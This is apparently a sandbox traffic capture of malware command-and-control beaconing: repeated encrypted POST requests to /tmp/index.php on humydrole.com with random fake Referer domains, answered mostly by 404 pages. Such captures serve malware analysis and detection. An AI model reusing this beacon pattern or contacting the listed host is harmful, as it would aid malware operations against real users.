requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:02.949378967 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gvwgniojlhocgcel.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: humydrole.com
Dec 22, 2023 04:58:02.949378967 CET	301	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5c 52 dd 9a Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vu\RJOOkirdq"5{<K/Y/B+U9IsL>[9J?<A\|tcR^4qNHz#byu`RF1
Dec 22, 2023 04:58:03.435318947 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:03 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:03.717118025 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qroajrxixmetfju.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 185 Host: humydrole.com
Dec 22, 2023 04:58:03.717159033 CET	185	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2f 27 d1 82 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vu/'uEDKXmW}T:xh?OT+2_#:,$xEI;e0`VGF}
Dec 22, 2023 04:58:04.106384039 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:03 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:04.385323048 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iiuoqkufoitwlik.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 235 Host: humydrole.com
Dec 22, 2023 04:58:04.385346889 CET	235	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 75 22 b7 e8 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vuu"cNKZcXPRr.}u>G$c(`K%&kC9G[uktG.&bAq-2mN
Dec 22, 2023 04:58:04.770001888 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:04 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:05.060440063 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kajxggvgjptxg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 309 Host: humydrole.com
Dec 22, 2023 04:58:05.060489893 CET	309	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 51 46 e4 e0 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vuQFRX>eg#@rlAc:`#VMI#M:[}@Fxc:h8GkilOHS.%8miYX beq62
Dec 22, 2023 04:58:05.463830948 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:05 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:05.745928049 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fsivfgrcqpxdgpte.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: humydrole.com
Dec 22, 2023 04:58:05.745963097 CET	149	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 59 0d bb a5 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vuYEyFRzQ^b{qYnpSb= Dgt=.d^3
Dec 22, 2023 04:58:06.133402109 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:05 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:06.412528992 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ltiksxqnkvgm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: humydrole.com
Dec 22, 2023 04:58:06.412563086 CET	280	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 48 3f bf 8a Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vuH?e0stgn`?Wb+pUSMo!B?+R~CA-)k7h~#a<RPhQQB\|*4ni{kf/+
Dec 22, 2023 04:58:06.793915987 CET	238	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 03:58:06 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:07.086675882 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dnhppaivpakuxf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: humydrole.com
Dec 22, 2023 04:58:07.086725950 CET	242	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 25 42 c3 a7 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vu%BSVWslW{%.a)A=6sC235m:5YV*FK{gEEpEZ>K3d<g#LK^m!We5-D
Dec 22, 2023 04:58:07.494965076 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:07 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:07.776248932 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vcqrjjawkuhasa.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 324 Host: humydrole.com
Dec 22, 2023 04:58:07.776305914 CET	324	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4a 59 d9 af Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vuJYaUqZmXLV?gpe<o&^(WY=\|aK8k}6B9B!w'K=NiWo mC<~Uxqw
Dec 22, 2023 04:58:08.162739038 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:07 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:08.461747885 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://longolbvkuo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: humydrole.com
Dec 22, 2023 04:58:08.461797953 CET	133	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 28 25 c4 e6 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vu(%\|/Zp-[]yA[m8}
Dec 22, 2023 04:58:08.854792118 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:08 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>